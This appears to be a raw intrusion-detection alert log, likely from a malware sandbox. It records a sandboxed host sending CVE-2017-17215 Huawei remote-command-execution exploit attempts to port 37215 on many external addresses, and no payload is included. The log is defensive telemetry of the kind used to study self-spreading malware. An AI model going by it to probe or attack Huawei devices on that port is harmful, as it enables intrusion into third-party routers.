                                                    07/10/24-08:27:23.866031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037637215192.168.2.14102.127.243.110
                                                    07/10/24-08:26:13.830274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901037215192.168.2.1481.248.239.7
                                                    07/10/24-08:26:29.864759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741237215192.168.2.1475.244.56.200
                                                    07/10/24-08:26:11.116364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599037215192.168.2.14197.215.53.253
                                                    07/10/24-08:27:14.896210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472837215192.168.2.14197.8.227.21
                                                    07/10/24-08:27:28.055753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130037215192.168.2.14197.253.189.195
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662037215192.168.2.1481.1.222.242
                                                    07/10/24-08:26:55.379647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412237215192.168.2.14157.181.42.78
                                                    07/10/24-08:26:22.221406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488237215192.168.2.14197.194.34.31
                                                    07/10/24-08:26:48.021815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136837215192.168.2.14157.183.103.243
                                                    07/10/24-08:26:28.879483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441837215192.168.2.1441.177.250.49
                                                    07/10/24-08:26:45.583346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195237215192.168.2.1441.117.82.130
                                                    07/10/24-08:26:38.518117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009637215192.168.2.14197.253.154.255
                                                    07/10/24-08:27:23.944748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870237215192.168.2.14197.72.250.87
                                                    07/10/24-08:26:29.847000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064637215192.168.2.1441.91.235.25
                                                    07/10/24-08:27:32.605681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088037215192.168.2.14197.41.173.227
                                                    07/10/24-08:27:33.863789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177437215192.168.2.1441.95.55.215
                                                    07/10/24-08:26:17.974758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602037215192.168.2.14165.231.120.204
                                                    07/10/24-08:26:28.826796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057637215192.168.2.14147.101.133.223
                                                    07/10/24-08:27:08.432094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131637215192.168.2.14197.84.108.92
                                                    07/10/24-08:27:17.022999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481437215192.168.2.14157.162.199.1
                                                    07/10/24-08:26:47.840922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396837215192.168.2.1412.91.224.169
                                                    07/10/24-08:26:17.949635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946237215192.168.2.14197.134.200.55
                                                    07/10/24-08:26:53.163403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222037215192.168.2.1474.15.86.66
                                                    07/10/24-08:27:13.964289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403237215192.168.2.1457.142.234.142
                                                    07/10/24-08:27:02.942646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967437215192.168.2.14197.181.210.61
                                                    07/10/24-08:26:28.886880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227037215192.168.2.14157.222.124.57
                                                    07/10/24-08:26:55.407973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438437215192.168.2.14157.18.84.197
                                                    07/10/24-08:26:34.207018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392637215192.168.2.14157.114.128.84
                                                    07/10/24-08:26:43.890192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722637215192.168.2.14197.64.136.11
                                                    07/10/24-08:26:23.352654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494437215192.168.2.14197.19.29.176
                                                    07/10/24-08:26:57.560013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412437215192.168.2.14134.237.232.0
                                                    07/10/24-08:26:14.822211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517837215192.168.2.1441.55.167.156
                                                    07/10/24-08:26:23.340651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.14197.198.205.215
                                                    07/10/24-08:26:41.440883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991037215192.168.2.14157.122.159.56
                                                    07/10/24-08:27:32.532226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343037215192.168.2.1441.49.21.51
                                                    07/10/24-08:26:14.814574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798437215192.168.2.1441.172.101.128
                                                    07/10/24-08:27:27.172380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754837215192.168.2.14173.62.208.83
                                                    07/10/24-08:27:28.055753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608437215192.168.2.1441.213.217.44
                                                    07/10/24-08:27:08.392064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.14197.140.173.110
                                                    07/10/24-08:26:55.429155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180637215192.168.2.14157.25.77.213
                                                    07/10/24-08:27:30.545208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709637215192.168.2.14157.154.130.190
                                                    07/10/24-08:26:22.210763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762437215192.168.2.14197.83.5.189
                                                    07/10/24-08:26:36.351608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841037215192.168.2.14136.150.188.27
                                                    07/10/24-08:26:38.619683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345037215192.168.2.14101.22.73.63
                                                    07/10/24-08:26:45.610191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523437215192.168.2.14157.35.14.27
                                                    07/10/24-08:26:11.133869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673637215192.168.2.14197.132.201.193
                                                    07/10/24-08:26:52.052711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950837215192.168.2.14157.89.128.128
                                                    07/10/24-08:26:57.603262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5944237215192.168.2.1441.4.246.41
                                                    07/10/24-08:27:14.881781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293437215192.168.2.14197.55.63.3
                                                    07/10/24-08:27:19.334361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.1441.62.198.136
                                                    07/10/24-08:27:19.215943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807437215192.168.2.14197.195.28.55
                                                    07/10/24-08:26:26.585966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026237215192.168.2.1441.88.192.175
                                                    07/10/24-08:26:28.716778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722237215192.168.2.14197.183.196.118
                                                    07/10/24-08:26:17.963816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135837215192.168.2.14157.183.26.252
                                                    07/10/24-08:26:18.006056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619437215192.168.2.14157.7.228.224
                                                    07/10/24-08:27:23.909366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287837215192.168.2.14197.68.66.27
                                                    07/10/24-08:27:13.915604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070037215192.168.2.1441.28.6.161
                                                    07/10/24-08:27:19.271475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615237215192.168.2.14165.118.26.103
                                                    07/10/24-08:26:22.269979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863237215192.168.2.14116.105.19.76
                                                    07/10/24-08:27:28.134313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436237215192.168.2.14157.130.48.224
                                                    07/10/24-08:26:22.224189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3604037215192.168.2.14157.149.106.14
                                                    07/10/24-08:27:19.285885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588437215192.168.2.14157.142.86.164
                                                    07/10/24-08:27:23.968110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070237215192.168.2.1444.28.66.64
                                                    07/10/24-08:26:41.318227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048237215192.168.2.14197.179.11.135
                                                    07/10/24-08:27:27.070313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740637215192.168.2.14157.246.178.150
                                                    07/10/24-08:26:36.340754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566437215192.168.2.1441.108.159.184
                                                    07/10/24-08:27:05.189042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567437215192.168.2.14157.242.14.200
                                                    07/10/24-08:27:21.440829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579637215192.168.2.14157.90.139.113
                                                    07/10/24-08:27:02.733003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937237215192.168.2.1441.25.184.105
                                                    07/10/24-08:26:28.761249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330237215192.168.2.14157.163.47.146
                                                    07/10/24-08:26:44.495455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994637215192.168.2.14197.189.106.133
                                                    07/10/24-08:27:10.666062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663037215192.168.2.14179.253.169.83
                                                    07/10/24-08:27:08.419157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796237215192.168.2.14157.46.241.188
                                                    07/10/24-08:26:47.966709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473437215192.168.2.14157.190.164.219
                                                    07/10/24-08:26:43.656614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822237215192.168.2.14197.139.30.181
                                                    07/10/24-08:26:38.648004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606437215192.168.2.1441.219.177.134
                                                    07/10/24-08:26:23.356000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711837215192.168.2.14197.19.223.167
                                                    07/10/24-08:27:19.170794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170637215192.168.2.1441.6.186.203
                                                    07/10/24-08:27:22.540241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361837215192.168.2.1449.83.84.161
                                                    07/10/24-08:27:28.144364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447437215192.168.2.14218.3.241.134
                                                    07/10/24-08:27:23.920658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352037215192.168.2.14196.217.141.128
                                                    07/10/24-08:26:31.076000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277037215192.168.2.1441.41.31.30
                                                    07/10/24-08:26:41.342760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.14197.159.167.165
                                                    07/10/24-08:26:59.765142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380837215192.168.2.1441.31.101.163
                                                    07/10/24-08:26:52.077257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344237215192.168.2.1441.97.222.1
                                                    07/10/24-08:26:11.190243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5271237215192.168.2.14115.183.79.252
                                                    07/10/24-08:26:42.366106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654237215192.168.2.14157.134.241.39
                                                    07/10/24-08:27:19.308441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401837215192.168.2.1441.58.209.238
                                                    07/10/24-08:26:31.095696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406837215192.168.2.1441.134.89.40
                                                    07/10/24-08:26:52.036336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822437215192.168.2.14197.51.107.218
                                                    07/10/24-08:27:33.925004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735837215192.168.2.14157.161.236.31
                                                    07/10/24-08:27:10.553055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269437215192.168.2.1440.206.29.241
                                                    07/10/24-08:26:25.469526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948837215192.168.2.1470.231.37.254
                                                    07/10/24-08:26:47.773656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392837215192.168.2.14197.124.35.187
                                                    07/10/24-08:27:05.146612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856837215192.168.2.1441.63.97.155
                                                    07/10/24-08:27:19.236089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115437215192.168.2.1441.191.225.78
                                                    07/10/24-08:27:17.063693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460437215192.168.2.1441.37.98.106
                                                    07/10/24-08:26:13.779688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257637215192.168.2.1441.156.25.221
                                                    07/10/24-08:26:15.880564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626437215192.168.2.14157.56.85.157
                                                    07/10/24-08:26:59.878182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253637215192.168.2.1485.178.101.145
                                                    07/10/24-08:27:30.553944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641037215192.168.2.14197.56.8.225
                                                    07/10/24-08:26:17.976557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213237215192.168.2.14115.249.24.207
                                                    07/10/24-08:26:59.610357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3532837215192.168.2.1419.181.195.19
                                                    07/10/24-08:26:13.780678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293437215192.168.2.14197.175.14.150
                                                    07/10/24-08:26:34.208199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529437215192.168.2.14208.229.122.242
                                                    07/10/24-08:27:14.856621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001437215192.168.2.14157.95.157.152
                                                    07/10/24-08:26:48.019730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344637215192.168.2.14157.3.136.73
                                                    07/10/24-08:26:13.672163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668237215192.168.2.14197.201.240.242
                                                    07/10/24-08:26:25.481164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162237215192.168.2.1441.152.118.17
                                                    07/10/24-08:27:17.084652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785237215192.168.2.14197.172.184.79
                                                    07/10/24-08:26:13.778927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146437215192.168.2.14157.82.104.201
                                                    07/10/24-08:27:19.343381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831237215192.168.2.14213.60.170.55
                                                    07/10/24-08:26:20.162511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746837215192.168.2.14197.251.112.72
                                                    07/10/24-08:27:11.568589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067437215192.168.2.14197.188.100.188
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389437215192.168.2.144.6.137.75
                                                    07/10/24-08:27:31.540964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724837215192.168.2.14197.57.53.181
                                                    07/10/24-08:27:10.655390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741637215192.168.2.14168.199.219.218
                                                    07/10/24-08:27:10.739922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641037215192.168.2.14157.252.140.105
                                                    07/10/24-08:26:28.808876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234037215192.168.2.14197.53.148.182
                                                    07/10/24-08:27:07.259693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501037215192.168.2.1441.230.52.112
                                                    07/10/24-08:27:13.991583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531837215192.168.2.1466.152.132.11
                                                    07/10/24-08:26:59.790586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435637215192.168.2.14212.234.158.166
                                                    07/10/24-08:27:08.437142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999837215192.168.2.14197.30.34.112
                                                    07/10/24-08:26:20.172014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279437215192.168.2.14157.193.136.92
                                                    07/10/24-08:26:53.178125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689437215192.168.2.14157.150.199.192
                                                    07/10/24-08:26:57.525834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843837215192.168.2.14157.179.38.202
                                                    07/10/24-08:26:34.192444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041037215192.168.2.1441.152.175.130
                                                    07/10/24-08:27:02.958790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416637215192.168.2.14213.220.234.211
                                                    07/10/24-08:27:31.538711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431437215192.168.2.14197.110.144.64
                                                    07/10/24-08:26:34.216588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803837215192.168.2.1441.107.238.177
                                                    07/10/24-08:26:53.165242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970837215192.168.2.14197.226.199.21
                                                    07/10/24-08:27:07.349677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080037215192.168.2.14197.44.68.14
                                                    07/10/24-08:27:23.840251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.14197.22.77.13
                                                    07/10/24-08:26:57.650835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3556637215192.168.2.14157.214.236.115
                                                    07/10/24-08:27:23.822671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680437215192.168.2.14157.113.11.153
                                                    07/10/24-08:27:27.138441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6075837215192.168.2.1441.43.119.126
                                                    07/10/24-08:27:20.507849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009837215192.168.2.14161.137.100.225
                                                    07/10/24-08:26:18.004122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546637215192.168.2.14197.249.132.62
                                                    07/10/24-08:27:05.189899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188437215192.168.2.14197.111.35.58
                                                    07/10/24-08:27:14.856517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398637215192.168.2.14197.123.223.174
                                                    07/10/24-08:27:17.053274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300237215192.168.2.1441.183.159.44
                                                    07/10/24-08:27:31.552344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455837215192.168.2.14197.128.40.49
                                                    07/10/24-08:26:47.912499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265437215192.168.2.14151.54.114.255
                                                    07/10/24-08:26:14.623309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635837215192.168.2.14157.97.0.66
                                                    07/10/24-08:27:23.962913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168637215192.168.2.14157.72.63.73
                                                    07/10/24-08:27:05.148385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064437215192.168.2.1441.11.213.255
                                                    07/10/24-08:27:13.996170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432437215192.168.2.14139.132.227.37
                                                    07/10/24-08:27:20.481143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172037215192.168.2.14136.135.212.64
                                                    07/10/24-08:26:26.613103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372637215192.168.2.14197.218.198.186
                                                    07/10/24-08:26:14.815907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038837215192.168.2.14157.206.64.80
                                                    07/10/24-08:26:55.322018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543637215192.168.2.14197.148.104.21
                                                    07/10/24-08:27:30.520394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450237215192.168.2.14157.54.98.92
                                                    07/10/24-08:26:36.361562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114637215192.168.2.14197.145.248.123
                                                    07/10/24-08:27:23.956633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576837215192.168.2.14197.170.18.72
                                                    07/10/24-08:26:26.501498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753637215192.168.2.14157.34.68.119
                                                    07/10/24-08:26:15.861414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016637215192.168.2.1441.46.168.232
                                                    07/10/24-08:27:22.926314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076637215192.168.2.1441.220.49.125
                                                    07/10/24-08:26:43.526771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844637215192.168.2.14197.98.128.212
                                                    07/10/24-08:26:25.443294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361237215192.168.2.14157.24.52.113
                                                    07/10/24-08:26:52.024313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402837215192.168.2.14178.32.111.1
                                                    07/10/24-08:27:08.368400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753837215192.168.2.1441.126.55.112
                                                    07/10/24-08:27:05.240759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422637215192.168.2.14197.223.151.202
                                                    07/10/24-08:26:33.177763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720037215192.168.2.1419.107.147.149
                                                    07/10/24-08:27:33.928939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503037215192.168.2.14197.198.203.35
                                                    07/10/24-08:26:13.780678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387237215192.168.2.14191.77.251.99
                                                    07/10/24-08:26:52.045134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028037215192.168.2.14197.110.63.34
                                                    07/10/24-08:26:42.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335237215192.168.2.1441.91.33.83
                                                    07/10/24-08:26:59.861772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887037215192.168.2.1441.149.110.107
                                                    07/10/24-08:27:13.859325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993037215192.168.2.14157.103.248.217
                                                    07/10/24-08:27:22.487649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236037215192.168.2.14142.211.137.198
                                                    07/10/24-08:27:05.165980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209837215192.168.2.1441.22.182.8
                                                    07/10/24-08:26:59.534289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709037215192.168.2.1441.66.69.67
                                                    07/10/24-08:26:41.574403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581637215192.168.2.14167.99.213.252
                                                    07/10/24-08:27:20.481124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481437215192.168.2.1441.116.188.67
                                                    07/10/24-08:27:23.962795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252037215192.168.2.1441.98.224.211
                                                    07/10/24-08:26:47.933430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679637215192.168.2.14197.216.98.69
                                                    07/10/24-08:26:59.633265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062037215192.168.2.14126.17.178.233
                                                    07/10/24-08:27:30.533467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974637215192.168.2.1441.194.127.227
                                                    07/10/24-08:26:52.018134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008837215192.168.2.14157.4.227.167
                                                    07/10/24-08:26:57.637421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540037215192.168.2.14157.59.177.248
                                                    07/10/24-08:26:59.640486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148237215192.168.2.1441.20.201.198
                                                    07/10/24-08:26:11.093817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619437215192.168.2.14157.118.62.90
                                                    07/10/24-08:26:36.367813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649637215192.168.2.14197.231.99.21
                                                    07/10/24-08:26:29.835368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070637215192.168.2.1441.66.252.76
                                                    07/10/24-08:26:20.175065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678037215192.168.2.1441.232.159.0
